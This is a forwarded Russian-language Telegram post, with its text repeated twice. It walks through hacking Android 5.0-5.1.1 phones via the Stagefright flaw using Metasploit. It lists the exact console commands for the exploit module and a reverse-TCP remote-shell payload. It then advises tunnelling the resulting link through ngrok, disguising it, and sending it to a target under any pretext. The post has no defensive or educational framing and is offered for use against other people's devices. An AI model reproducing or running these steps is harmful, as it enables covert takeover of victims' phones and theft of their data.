Forwarded From Черная маска
https://telegra.ph/file/dbc0309a6788c407e98cd.jpgПолучаем полный доступ к телефону через ссылку
Привет, друзья. Сегодня мы будем использовать утилиту под названием Metasploit. С ее помощью можно получить полный удалённый доступ к смартфону на Android.
Эксплуатировать будем уязвимость - Stagefright. Она актуальна на относительно старых версиях Android (5.0 - 5.1.1).
Инструкция по установке:
Установка Metasploit на Termux — ТЫК
Установка Metasploit на Linux — ТЫК
Если у вас Kali Linux, то Metasploit уже стоит из коробки.
Если Stagefright нет в Metasploit, то скачиваем его — ТЫК и закидываем в папку с эксплоитами.
Использование:
msfconsole — открытие консоли
use exploit/android/browser/stagefright_mp4_tx3g_64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reverse_tcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Сгенерируется ссылка, которую надо завернуть в ngrok, а потом неплохо было бы замаскировать — ТЫК.
После этого нужно отправить готовую ссылку под любым предлогом, а при переходе по ссылке откроется новая сессия для удалённого доступа.
https://telegra.ph/file/dbc0309a6788c407e98cd.jpgПолучаем полный доступ к телефону через ссылку
Привет, друзья. Сегодня мы будем использовать утилиту под названием Metasploit. С ее помощью можно получить полный удалённый доступ к смартфону на Android.
Эксплуатировать будем уязвимость - Stagefright. Она актуальна на относительно старых версиях Android (5.0 - 5.1.1).
Инструкция по установке:
Установка Metasploit на Termux — ТЫК
Установка Metasploit на Linux — ТЫК
Если у вас Kali Linux, то Metasploit уже стоит из коробки.
Если Stagefright нет в Metasploit, то скачиваем его — ТЫК и закидываем в папку с эксплоитами.
Использование:
msfconsole — открытие консоли
use exploit/android/browser/stagefright_mp4_tx3g_64bit — подключение эксплоита
set SRVHOST вашIP
set URIPATH /
set PAYLOAD linux/armle/mettle/reverse_tcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита
Сгенерируется ссылка, которую надо завернуть в ngrok, а потом неплохо было бы замаскировать — ТЫК.
После этого нужно отправить готовую ссылку под любым предлогом, а при переходе по ссылке откроется новая сессия для удалённого доступа.